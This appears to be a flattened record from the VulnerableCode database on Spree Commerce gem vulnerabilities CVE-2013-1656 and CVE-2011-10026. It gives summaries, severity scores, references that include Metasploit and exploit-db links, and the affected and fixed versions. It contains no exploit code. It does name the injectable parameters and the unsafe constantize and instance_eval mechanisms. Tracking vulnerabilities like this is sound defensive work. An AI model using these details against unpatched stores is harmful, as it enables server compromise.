weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t9gu-2vs3-g7cu
5
url VCID-y37s-b27m-n7ad
vulnerability_id VCID-y37s-b27m-n7ad
summary
Authenticated administrators to execute arbitrary commands
Spree Commerce allows remote authenticated administrators to instantiate arbitrary Ruby objects and execute arbitrary commands via the (1) payment_method parameter to core/app/controllers/spree/admin/payment_methods_controller.rb; and the (2) promotion_action parameter to promotion_actions_controller.rb, (3) promotion_rule parameter to promotion_rules_controller.rb, and (4) calculator_type parameter to promotions_controller.rb in promo/app/controllers/spree/admin/, related to unsafe use of the constantize function.
references
0
reference_url http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656
reference_id
reference_type
scores
url http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2013-1656
reference_id
reference_type
scores
0
value 0.00305
scoring_system epss
scoring_elements 0.541
published_at 2026-06-05T12:55:00Z
1
value 0.00305
scoring_system epss
scoring_elements 0.54074
published_at 2026-06-08T12:55:00Z
2
value 0.00305
scoring_system epss
scoring_elements 0.54097
published_at 2026-06-09T12:55:00Z
3
value 0.00305
scoring_system epss
scoring_elements 0.54043
published_at 2026-06-04T12:55:00Z
4
value 0.00305
scoring_system epss
scoring_elements 0.54108
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2013-1656
2
reference_url https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656
3
reference_url https://github.com/advisories/GHSA-jxx8-v83v-rhw3
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jxx8-v83v-rhw3
4
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml
5
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
6
reference_url https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2013-1656
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2013-1656
8
reference_url https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt
9
reference_url https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed
10
reference_url https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html
fixed_packages
0
url pkg:gem/spree@1.3.3
purl pkg:gem/spree@1.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
3
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.3
1
url pkg:gem/spree@2.0.0.rc1
purl pkg:gem/spree@2.0.0.rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0.rc1
2
url pkg:gem/spree@2.0.0
purl pkg:gem/spree@2.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-cwh1-mmky-ukcx
2
vulnerability VCID-s4mu-v75h-dfep
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0
aliases CVE-2013-1656, GHSA-jxx8-v83v-rhw3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y37s-b27m-n7ad
Fixing_vulnerabilities
0
url VCID-w5fg-qcqv-uugu
vulnerability_id VCID-w5fg-qcqv-uugu
summary
Spree Commerce is vulnerable to RCE through Search API
Spreecommerce versions prior to 0.50.x contain a remote command
execution vulnerability in the API's search functionality. Improper
input sanitization allows attackers to inject arbitrary shell commands
via the search[instance_eval] parameter, which is dynamically invoked
using Ruby’s send method. This flaw enables unauthenticated attackers
to execute commands on the server.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2011-10026
reference_id
reference_type
scores
0
value 0.68643
scoring_system epss
scoring_elements 0.98637
published_at 2026-06-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2011-10026
1
reference_url https://github.com/advisories/GHSA-x485-rhg3-cqr4
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x485-rhg3-cqr4
2
reference_url https://github.com/spree
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://github.com/spree
3
reference_url https://github.com/spree/spree
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree
4
reference_url https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4
5
reference_url https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978
6
reference_url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb
7
reference_url https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes
8
reference_url https://www.exploit-db.com/exploits/17199
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://www.exploit-db.com/exploits/17199
9
reference_url https://www.vulncheck.com/advisories/spreecommerce-api-rce
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/
url https://www.vulncheck.com/advisories/spreecommerce-api-rce
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2011-10026
reference_id CVE-2011-10026
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2011-10026
11
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml
reference_id CVE-2011-10026.YML
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml
12
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml
reference_id CVE-2011-10026.YML
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml
fixed_packages
0
url pkg:gem/spree@0.50.0
purl pkg:gem/spree@0.50.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-153y-kwk2-xyfd
1
vulnerability VCID-7jum-4ny7-xuhy
2
vulnerability VCID-cwh1-mmky-ukcx
3
vulnerability VCID-s4mu-v75h-dfep
4
vulnerability VCID-t9gu-2vs3-g7cu
5
vulnerability VCID-y37s-b27m-n7ad
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0
aliases CVE-2011-10026, GHSA-x485-rhg3-cqr4
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w5fg-qcqv-uugu
Risk_score 10.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0